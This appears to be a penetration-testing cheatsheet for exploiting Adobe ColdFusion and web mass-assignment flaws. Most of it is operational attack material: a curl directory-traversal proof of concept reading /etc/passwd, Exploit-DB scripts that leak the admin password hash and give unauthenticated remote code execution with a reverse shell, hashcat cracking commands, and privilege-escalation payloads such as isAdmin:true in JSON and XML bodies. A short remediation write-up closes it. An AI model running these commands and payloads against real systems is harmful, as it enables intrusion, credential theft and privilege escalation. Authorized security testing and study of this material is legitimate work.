π‘οΈ Methodology Checklist
- ColdFusion: identify version via admin page or
/_cfide/administrator/ - CVE-2010-2861: directory traversal for password hash
- CVE-2009-2265: unauthenticated file upload RCE
- Crack ColdFusion SHA1 hash:
hashcat -m 100 - Mass Assignment: test API object parameters for unexposed fields
- Add
isAdmin: trueorrole: adminto JSON POST body - Test PATCH/PUT methods if GET/POST are filtered
- Document parameters that should not be user-controllable
π― Operational Context
Use when: Adobe ColdFusion identified, or REST API with mass assignment vulnerability β exploit directory traversal for CF config read, or over-permissive JSON binding.
Think Dumber First: ColdFusion older than 2018 update 3 β check for /CFIDE/administrator/ default admin, and CVE-2010-2861 directory traversal. Mass assignment: add "isAdmin":true or "role":"admin" to any JSON POST body and check if it takes effect.
Skip when: ColdFusion is current version with patches and no CFIDE exposed.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -p- -sV -sC -Pn [TARGET_IP] --open | Full scan β ColdFusion default port 8500 not in top 1000 |
searchsploit adobe coldfusion | Find CF exploits by version |
curl -s http://[TARGET_IP]:8500/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd | ColdFusion CVE-2010-2861 directory traversal PoC |
python2 14641.py [TARGET_IP] 8500 "../../../../../../../../ColdFusion8/lib/password.properties" | Leak CF admin password SHA1 hash (searchsploit -p 14641) |
python3 50057.py | CF 8 β€ 8.0.1 unauthenticated RCE via FCKeditor (CVE-2009-2265) |
π¬ Deep Dive & Workflow
Web Mass Assignment
| Parameter | Common Impact |
|---|---|
admin / is_admin | Administrative access |
role / role_id | Privilege escalation |
confirmed / active | Bypass email/admin verification |
balance / amount | Financial manipulation |
plan_id | Account tier upgrade |
Attack flow:
1. Observe standard registration/update params
2. GET /profile β inspect JSON response for hidden fields
3. Add sensitive param to POST/PUT body:
username=test&password=P@ss&confirmed=true
or JSON: {"user":{"username":"test","admin":true}}
4. Verify: log in β check if admin panel / approved status accessible
Parameter discovery without source:
# Arjun automated parameter finder
arjun -u http://[TARGET_IP]/register -m POST
# Burp Intruder: fuzz parameter names with SecLists param wordlistContent-Type trick: If application/x-www-form-urlencoded fails, switch to application/json in Burp β frameworks handle them differently.
ColdFusion Fingerprinting
Port: 8500 (default) β MUST use nmap -p- to find
Indicators:
- /CFIDE/ or /cfdocs/ directories
- Cookie names: CFID, CFTOKEN
- Extensions: .cfm (pages), .cfc (components)
- Header: X-Powered-By: ColdFusion
Admin panel paths:
http://[IP]:8500/CFIDE/administrator/index.cfm
http://[IP]:8500/CFIDE/administrator/enter.cfm
ColdFusion Attack Paths
CVE-2010-2861 (CF 8/9 directory traversal):
β locale parameter in admin CFM files β read arbitrary files
β Target: lib/password.properties β SHA1 admin hash
β Crack hash or use in admin login
β Python2 exploit: searchsploit -p 14641
CVE-2009-2265 (CF β€ 8.0.1 unauthenticated RCE):
β FCKeditor arbitrary file upload
β Python3 exploit: searchsploit -p 50057
β Edit script: lhost, lport, rhost, rport β python3 50057.py
β Catch shell (Windows - runs as CF service account)
β Use .jsp shells (Java-based, not .php)
CVE-2023-26360 (Modern versions):
β Arbitrary file read / RCE β check Exploit-DB for PoC
Traversal targets:
| File | Contents |
|---|---|
lib/password.properties | Admin + RDS password hash |
logs/audit.log | User activity |
lib/neo-runtime.xml | Server config + encrypted passwords |
RDS password tip: If SHA1 hash canβt be cracked, try RDS password in same properties file β often weaker.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| ColdFusion admin panel not accessible | Port or path different | Try: 8500 (default CF port), /CFIDE/, /cfide/ (case-insensitive) |
| Directory traversal blocked on modern CF | Patched | Check CF version via error pages; versions before 2018 Update 3 are vulnerable |
| Mass assignment test produces no change | Framework doesnβt bind extra fields | Try different field names: admin, isAdmin, role, permissions, group |
| CF scheduling task RCE fails | CF not running as admin | Task still executes as CF service account; check service account permissions |
| Mass assignment in XML format | Content-Type different | Send as XML: <root><isAdmin>true</isAdmin></root> with Content-Type: application/xml |
π Reporting Trigger
Finding Title: Mass Assignment Vulnerability Enables Privilege Escalation via API Impact: Mass assignment allows clients to set server-side object properties by including additional fields in API requests, enabling privilege escalation to admin roles or modification of account properties not intended to be user-controlled. Root Cause: API framework automatically binds all JSON/form fields to model objects without filtering. No explicit allowlist of bindable fields defined. Recommendation: Implement explicit allowlists for API-bindable model fields. Use Data Transfer Objects (DTOs) that expose only intended fields. Audit all API endpoints for mass assignment using automated tools. Implement attribute-level access control.